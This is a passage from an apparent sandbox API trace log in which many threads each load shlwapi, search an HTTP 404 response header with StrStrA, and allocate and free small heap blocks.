dwFlags=0x0, lpMem=0x6af418 | out: hHeap=0x690000) returned 1 Thread: id = 43 os_tid = 0x60c [0180.448] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0180.483] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:45 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0180.483] GetProcessHeap () returned 0x690000 [0180.483] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeac0 [0180.483] GetProcessHeap () returned 0x690000 [0180.483] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeac0 | out: hHeap=0x690000) returned 1 [0180.483] GetProcessHeap () returned 0x690000 [0180.483] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af418 | out: hHeap=0x690000) returned 1 Thread: id = 44 os_tid = 0xadc [0180.792] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0180.793] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:45 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0180.793] GetProcessHeap () returned 0x690000 [0180.793] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeac0 [0180.793] GetProcessHeap () returned 0x690000 [0180.793] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeac0 | out: hHeap=0x690000) returned 1 [0180.793] GetProcessHeap () returned 0x690000 [0180.793] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af418 | out: hHeap=0x690000) returned 1 Thread: id = 45 os_tid = 0xcbc [0181.181] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0181.183] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:46 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0181.183] GetProcessHeap () returned 0x690000 [0181.183] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb20 [0181.184] GetProcessHeap () returned 0x690000 [0181.184] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb20 | out: hHeap=0x690000) returned 1 [0181.184] GetProcessHeap () returned 0x690000 [0181.184] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af418 | out: hHeap=0x690000) returned 1 Thread: id = 46 os_tid = 0xcb8 [0181.651] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0181.651] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:46 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0181.652] GetProcessHeap () returned 0x690000 [0181.652] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb20 [0181.652] GetProcessHeap () returned 0x690000 [0181.652] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb20 | out: hHeap=0x690000) returned 1 [0181.652] GetProcessHeap () returned 0x690000 [0181.652] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af418 | out: hHeap=0x690000) returned 1 Thread: id = 47 os_tid = 0x8ec [0182.140] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.141] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:47 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0182.141] GetProcessHeap () returned 0x690000 [0182.141] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb20 [0182.141] GetProcessHeap () returned 0x690000 [0182.141] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb20 | out: hHeap=0x690000) returned 1 [0182.141] GetProcessHeap () returned 0x690000 [0182.141] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 Thread: id = 48 os_tid = 0xa6c [0182.335] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.335] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:47 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0182.335] GetProcessHeap () returned 0x690000 [0182.335] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb20 [0182.335] GetProcessHeap () returned 0x690000 [0182.335] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb20 | out: hHeap=0x690000) returned 1 [0182.335] GetProcessHeap () returned 0x690000 [0182.336] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 Thread: id = 49 os_tid = 0xb20 [0182.550] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.551] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:47 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0182.551] GetProcessHeap () returned 0x690000 [0182.551] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb20 [0182.551] GetProcessHeap () returned 0x690000 [0182.551] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb20 | out: hHeap=0x690000) returned 1 [0182.551] GetProcessHeap () returned 0x690000 [0182.551] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 Thread: id = 50 os_tid = 0xb1c [0182.759] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.759] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:48 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0182.759] GetProcessHeap () returned 0x690000 [0182.759] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb20 [0182.759] GetProcessHeap () returned 0x690000 [0182.759] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb20 | out: hHeap=0x690000) returned 1 [0182.759] GetProcessHeap () returned 0x690000 [0182.759] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 Thread: id = 51 os_tid = 0xe40 [0182.909] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0182.954] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:48 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0182.954] GetProcessHeap () returned 0x690000 [0182.954] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea90 [0182.954] GetProcessHeap () returned 0x690000 [0182.954] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea90 | out: hHeap=0x690000) returned 1 [0182.954] GetProcessHeap () returned 0x690000 [0182.955] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 Thread: id = 52 os_tid = 0xd90 [0183.103] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0183.105] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:48 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0183.105] GetProcessHeap () returned 0x690000 [0183.105] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea30 [0183.105] GetProcessHeap () returned 0x690000 [0183.105] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea30 | out: hHeap=0x690000) returned 1 [0183.105] GetProcessHeap () returned 0x690000 [0183.106] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 Thread: id = 53 os_tid = 0x50c [0183.292] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0183.292] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:48 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0183.293] GetProcessHeap () returned 0x690000 [0183.293] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea30 [0183.293] GetProcessHeap () returned 0x690000 [0183.293] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea30 | out: hHeap=0x690000) returned 1 [0183.293] GetProcessHeap () returned 0x690000 [0183.293] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 Thread: id = 54 os_tid = 0xfe8 [0183.443] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0183.468] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:48 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0183.468] GetProcessHeap () returned 0x690000 [0183.468] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea30 [0183.468] GetProcessHeap () returned 0x690000 [0183.468] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea30 | out: hHeap=0x690000) returned 1 [0183.468] GetProcessHeap () returned 0x690000 [0183.469] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 Thread: id = 55 os_tid = 0x7a0 [0183.786] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0183.787] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:48 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0183.787] GetProcessHeap () returned 0x690000 [0183.787] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea30 [0183.787] GetProcessHeap () returned 0x690000 [0183.787] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea30 | out: hHeap=0x690000) returned 1 [0183.787] GetProcessHeap () returned 0x690000 [0183.787] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 Thread: id = 56 os_tid = 0x2e4 [0184.009] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.009] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:49 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0184.009] GetProcessHeap () returned 0x690000 [0184.009] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea30 [0184.009] GetProcessHeap () returned 0x690000 [0184.009] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea30 | out: hHeap=0x690000) returned 1 [0184.009] GetProcessHeap () returned 0x690000 [0184.010] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 Thread: id = 57 os_tid = 0x154 [0184.216] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.217] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:49 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0184.217] GetProcessHeap () returned 0x690000 [0184.217] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea30 [0184.217] GetProcessHeap () returned 0x690000 [0184.217] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea30 | out: hHeap=0x690000) returned 1 [0184.217] GetProcessHeap () returned 0x690000 [0184.217] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 Thread: id = 58 os_tid = 0x844 [0184.408] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.408] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:49 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0184.408] GetProcessHeap () returned 0x690000 [0184.408] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea30 [0184.408] GetProcessHeap () returned 0x690000 [0184.409] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea30 | out: hHeap=0x690000) returned 1 [0184.409] GetProcessHeap () returned 0x690000 [0184.409] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 Thread: id = 59 os_tid = 0x5f0 [0184.598] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.598] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:49 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0184.598] GetProcessHeap () returned 0x690000 [0184.598] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea30 [0184.598] GetProcessHeap () returned 0x690000 [0184.598] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea30 | out: hHeap=0x690000) returned 1 [0184.598] GetProcessHeap () returned 0x690000 [0184.599] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 Thread: id = 60 os_tid = 0xef0 [0184.764] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.797] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:50 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0184.797] GetProcessHeap () returned 0x690000 [0184.797] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea30 [0184.797] GetProcessHeap () returned 0x690000 [0184.797] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea30 | out: hHeap=0x690000) returned 1 [0184.797] GetProcessHeap () returned 0x690000 [0184.798] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 Thread: id = 61 os_tid = 0x100c [0184.991] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.993] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:50 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0184.993] GetProcessHeap () returned 0x690000 [0184.993] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea30 [0184.993] GetProcessHeap () returned 0x690000 [0184.993] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea30 | out: hHeap=0x690000) returned 1 [0184.993] GetProcessHeap () returned 0x690000 [0184.994] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 Thread: id = 62 os_tid = 0x1010 [0185.245] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.245] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:50 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0185.245] GetProcessHeap () returned 0x690000 [0185.245] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea30 [0185.245] GetProcessHeap () returned 0x690000 [0185.245] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea30 | out: hHeap=0x690000) returned 1 [0185.245] GetProcessHeap () returned 0x690000 [0185.246] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 Thread: id = 63 os_tid = 0x1028 [0185.399] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.399] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:50 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0185.399] GetProcessHeap () returned 0x690000 [0185.399] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea30 [0185.399] GetProcessHeap () returned 0x690000 [0185.399] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea30 | out: hHeap=0x690000) returned 1 [0185.399] GetProcessHeap () returned 0x690000 [0185.399] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 Thread: id = 64 os_tid = 0x102c [0185.583] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.583] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:50 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0185.583] GetProcessHeap () returned 0x690000 [0185.583] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea30 [0185.583] GetProcessHeap () returned 0x690000 [0185.583] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea30 | out: hHeap=0x690000) returned 1 [0185.583] GetProcessHeap () returned 0x690000 [0185.584] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 Thread: id = 65 os_tid = 0x104c [0185.793] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.794] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:51 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0185.794] GetProcessHeap () returned 0x690000 [0185.794] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea30 [0185.794] GetProcessHeap () returned 0x690000 [0185.794] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea30 | out: hHeap=0x690000) returned 1 [0185.794] GetProcessHeap () returned 0x690000 [0185.794] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 Thread: id = 66 os_tid = 0x1050 [0185.993] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.994] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:51 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0185.994] GetProcessHeap () returned 0x690000 [0185.994] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea30 [0185.994] GetProcessHeap () returned 0x690000 [0185.994] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea30 | out: hHeap=0x690000) returned 1 [0185.994] GetProcessHeap () returned 0x690000 [0185.994] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 Thread: id = 67 os_tid = 0x1068 [0186.160] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.160] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:51 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0186.160] GetProcessHeap () returned 0x690000 [0186.160] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea48 [0186.160] GetProcessHeap () returned 0x690000 [0186.160] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea48 | out: hHeap=0x690000) returned 1 [0186.160] GetProcessHeap () returned 0x690000 [0186.161] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 Thread: id = 68 os_tid = 0x106c [0186.360] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.360] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:51 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0186.360] GetProcessHeap () returned 0x690000 [0186.360] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea30 [0186.360] GetProcessHeap () returned 0x690000 [0186.360] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea30 | out: hHeap=0x690000) returned 1 [0186.360] GetProcessHeap () returned 0x690000 [0186.361] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 Thread: id = 69 os_tid = 0xc30 [0186.534] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.534] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:51 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0186.534] GetProcessHeap () returned 0x690000 [0186.534] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea30 [0186.534] GetProcessHeap () returned 0x690000 [0186.534] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea30 | out: hHeap=0x690000) returned 1 [0186.534] GetProcessHeap () returned 0x690000 [0186.535] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 Thread: id = 70 os_tid = 0x1084 [0186.810] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.810] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:52 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0186.810] GetProcessHeap () returned 0x690000 [0186.810] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea30 [0186.810] GetProcessHeap () returned 0x690000 [0186.810] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea30 | out: hHeap=0x690000) returned 1 [0186.810] GetProcessHeap () returned 0x690000 [0186.811] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 Thread: id = 71 os_tid = 0xc84 [0186.976] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0186.976] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:52 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0186.976] GetProcessHeap () returned 0x690000 [0186.976] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea30 [0186.976] GetProcessHeap () returned 0x690000 [0186.977] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea30 | out: hHeap=0x690000) returned 1 [0186.977] GetProcessHeap () returned 0x690000 [0186.977] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 Thread: id = 72 os_tid = 0x1090 [0187.446] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0187.448] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:52 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0187.448] GetProcessHeap () returned 0x690000 [0187.448] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea30 [0187.448] GetProcessHeap () returned 0x690000 [0187.448] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea30 | out: hHeap=0x690000) returned 1 [0187.448] GetProcessHeap () returned 0x690000 [0187.449] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 Thread: id = 73 os_tid = 0x1098 [0187.746] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0187.776] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:43:53 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0187.776] GetProcessHeap () returned 0x690000 [0187.776] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aea30 [0187.776] GetProcessHeap () returned 0x690000 [0187.776] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aea30 | out: hHeap=0x690000) returned 1 [0187.776] GetProcessHeap () returned 0x690000 [0187.777] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | 